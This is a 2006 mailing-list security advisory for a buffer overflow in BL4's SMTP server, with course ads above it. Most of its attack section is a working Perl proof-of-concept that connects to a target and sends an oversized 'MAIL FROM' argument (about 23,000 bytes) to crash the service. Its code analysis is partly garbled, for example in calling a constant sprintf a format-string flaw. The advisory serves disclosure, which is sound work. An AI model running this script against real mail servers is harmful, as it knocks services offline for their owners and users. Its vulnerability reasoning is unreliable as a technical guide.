Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

BL4's SMTP server BufferOverflow Vulnerable

from [the_day] Network Security [Permanent Link]
Subject: BL4's SMTP server BufferOverflow Vulnerable
Date: 27 Apr 2006 08:24:25 -0000 
---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : BL4's SMTP server
version     : < 0.1.5
URL         : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :

BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email. 
The SMTP server puts the incoming email into various text files.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is to a flaw that can allow remote attacker to
cause a denial of service or a attacker can Execution of Arbitrary Code.
The vulnerability is due to a buffer overflow in the SMTP service. 
A remote attacker can repeatedly send more that 2100 bytes as the argument to 
the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------
                ...........
                {
                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        free(buffer);
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                }
                free(buffer);
                .............
                slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n"); 
                return buffer;
-----------------------------------------------------------
        --
        sprintf(buffer, "250 OK\r\n");
        --
        Vulnerable for format strings.
        
        --
        free(buffer);
        buffer = malloc(sizeof(char) * 12);
        --
        Vulnerable for buffer overflow.
A attacker can create Arbitrary Code here .


Poc:
~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;
use Socket;

my($socket) = "";


if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";


        print " -- Connecting To SMTP server at $adr port $prt ... \n";

        sleep(1);

        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to 
$adr .....\n" or die "Error : can't send Request\n";

        sleep(1);

        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- 
Sending Buffer to $adr .....\n";

        sleep(1);
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");

        close($socket);


sub usage()
 {
 print "\n=========================================\r\n";
 print "     BL4's SMTP server Remote DOS \r\n";
 print "=========================================\r\n";
 print "       Bug Found by Dedi Dwianto \r\n";
 print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "      Echo Security Research Group \r\n";
 print "=========================================\r\n";
 print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
 exit();
 }


---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • BL4's SMTP server BufferOverflow Vulnerable, the_day <=
Previous by Date:  [Full-disclosure] WinISO/UltraISO/MagicISO/PowerISO Directory Traversal Vulnerability, Sowhat
Next by Date:  Re: Recent Oracle exploit is _actually_ an 0day with no patch, Steven M. Christey
Previous by Thread:  [Full-disclosure] WinISO/UltraISO/MagicISO/PowerISO Directory Traversal Vulnerability, Sowhat
Next by Thread:  Secunia Research: Servant Salamander unacev2.dll Buffer Overflow Vulnerability, Secunia Research
Indexes:  [Date] [Thread] [Top] [All Lists]